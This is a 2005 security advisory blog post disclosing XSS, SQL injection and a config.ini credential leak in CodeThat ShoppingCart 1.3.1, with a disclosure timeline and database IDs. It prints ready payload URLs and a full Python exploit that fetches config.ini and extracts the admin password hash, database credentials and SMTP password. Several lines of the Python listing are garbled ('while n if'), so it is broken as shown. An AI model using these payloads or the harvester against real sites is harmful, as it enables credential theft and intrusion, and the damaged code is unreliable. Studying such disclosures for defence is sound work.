CodeThat ShoppingCart Critical information disclosure

Sunday, May 08, 2005
##########################################################
CodeThat ShoppingCart Critical information disclosure
XSS and SQL injection
vendor Url: http://www.codethat.com/shoppingcart/
advisore:http://lostmon.blogspot.com/2005/05/
codethat-shoppingcart-critical.html
vendor notifY: yes exploit available: yes
Discovered By Lostmon And icaro exploit code by icaro
OSVDB ID: 16155 , 16156 and 16157
Secunia:SA15251
BID:13560
Securitytracker:1013924
###########################################################

CodeThat ShoppingCart contains a flaw that may lead to an
unauthorized disclosure of SQL conection data.It is possible
to gain access to plain text SQL configuration details, this
could allow a user to create a specially crafted URL to access
'config.ini' file, which may lead to a loss of confidentiality.
This flaw reveals too the admin´s username and his password
hash.(automated exploit available) and the credential for
configuration of SMTP server.

Contains a flaw too that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'id' variables upon submission to the catalog.php scripts.This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a loss
of integrity.

All flaws are found by Lostmon (lostmon@gmail.com)
and icaro (icaro0@gmail.com)and exploit code is coded
by icaro from http://www.badchecksum.tk

##########
versions:
##########

1.3.1

###########
Solution
###########

no solution at this time

############
Timeline
############

discovered: 6 may 2005
vendor notify: 7 mayo 2005
vendor response: 8 mayo 2005 (automated response form spamarrest)
vendor fix
disclosure: 9 may 2005

##########
examples:
####################
Cross site scripting
####################

http://[victim]/codethat/catalog.php?action=category_show
&id=2"><script>alert(document.cookie)</script>

###############
SQL injections
###############

http://[victim]/shoppingcart/catalog.php?action=category_show
&id=1%20or%20like%20%60a%%60

nice SQL error/response ...

umm them try to list all products:

http://[victim]shoppingcart/demo/catalog.php?action=
category_show&id=1%20or%201=1

command execution sucesfully !!!!

aparently, non critical SQL injection ,the data base only have
tree tables and no passwords or other information are stored
in the database.


##############################
Critical information disclosure
Exploit code include.
###############################

A remote user can access directly to SQL user name, password
host, and all details about SQL configuration.

A remote user can access Directly to admin´s user name and password hash.


http://[victim]/shoppingcart/config.ini

##############################
Critical information disclosure.
###############################

A remote user can access directly to SQL user name, password
host, and all details about SQL configuration.

A remote user can access Directly to admin´s user name and password hash.

A remote user can obtain information about SMTP configuration.

http://[victim]/shoppingcart/config.ini

#############################################
Proof of concept automated exploit in Python
exploit url:www.badchecksum.tk/code/shopingfuck.py
#############################################

# Lostmon Dismarking tm && icaro Badchecksum tm
# Extract information tool exploit
# Coded by icaro, Discovered by lostmon && icaro
import httplib
import sys
import string
import socket
import os
def uso():
print '\n\n\nLOSTMON DISMARKING && ICARO BADCHECKSUM TEAM\n'
print 'Usage: python ' + sys.argv[0] + ' host /directory_of_shoping_cart/\n'
print 'Example: python '+ sys.argv[0] +' www.myhost.com /shoping/\n'
def leeini(direccionweb,directorioshoping):
web=httplib.HTTP(direccionweb)
web.putrequest('GET',directorioshoping+'config.ini')
web.putheader('Host',direccionweb)
web.putheader('Accept', 'text/html')
web.putheader('Accept', 'text/plain')
web.endheaders()
errcode, errmsg, headers = web.getreply()
fichero=web.getfile()
datos=fichero.read()
f=open('tmp.txt','w')
f.write(datos)
f.close
f=open('tmp.txt','r')
lineas=f.readlines()
f.close
n=0
print 'EXTRACCION DE PASSWD DE ADMIN SHOPING CART\n'
while n if (string.find(lineas[n],'admin_username'))==0:
imprime=string.replace(lineas[n],'admin_username : string ','Login ')
print imprime
if (string.find(lineas[n],'admin_password'))==0:
imprime=string.replace(lineas[n],'admin_password : string ','Passwd ')
print imprime
n=n+1
n=0
print 'EXTRACCION DE INFORMACION DE BASE DE DATOS\n'
while n if (string.find(lineas[n],'driver : string '))==0:
imprime=string.replace(lineas[n],'driver : string ','Tipo')
print imprime
if (string.find(lineas[n],'server : string '))==0:
imprime=string.replace(lineas[n],'server : string ','Servidor ')
print imprime
if (string.find(lineas[n],'user : string '))==0:
imprime=string.replace(lineas[n],'user : string ','Usuario ')
print imprime
if (string.find(lineas[n],'password : string '))==0:
imprime=string.replace(lineas[n],'password : string ','Passwd ')
print imprime
if (string.find(lineas[n],'database : string '))==0:
imprime=string.replace(lineas[n],'database : string ','Base de datos ')
print imprime
n=n+1
n=0
print 'EXTRACCION DE INFORMACION DEL SERVIDOR SMTP\n'
while n if (string.find(lineas[n],'checkout_email : string '))==0:
imprime=string.replace(lineas[n],'checkout_email : string ','Email
del admin ')
print imprime
if (string.find(lineas[n],'from_name : string '))==0:
imprime=string.replace(lineas[n],'from_name : string ','Nombre')
print imprime
if (string.find(lineas[n],'smtp_host : string '))==0:
imprime=string.replace(lineas[n],'smtp_host : string ','Host ')
print imprime
if (string.find(lineas[n],'smtp_username : string '))==0:
imprime=string.replace(lineas[n],'smtp_username : string ','Usuario ')
print imprime
if (string.find(lineas[n],'smtp_password : string '))==0:
imprime=string.replace(lineas[n],'smtp_password : string ','Passwd ')
print imprime
n=n+1

if len(sys.argv)==3:
leeini(sys.argv[1],sys.argv[2])
os.remove('tmp.txt')
else:
uso()

####################### end ##############

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
thnx to icaro he is with me and investigate.

--
atentamente:

Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...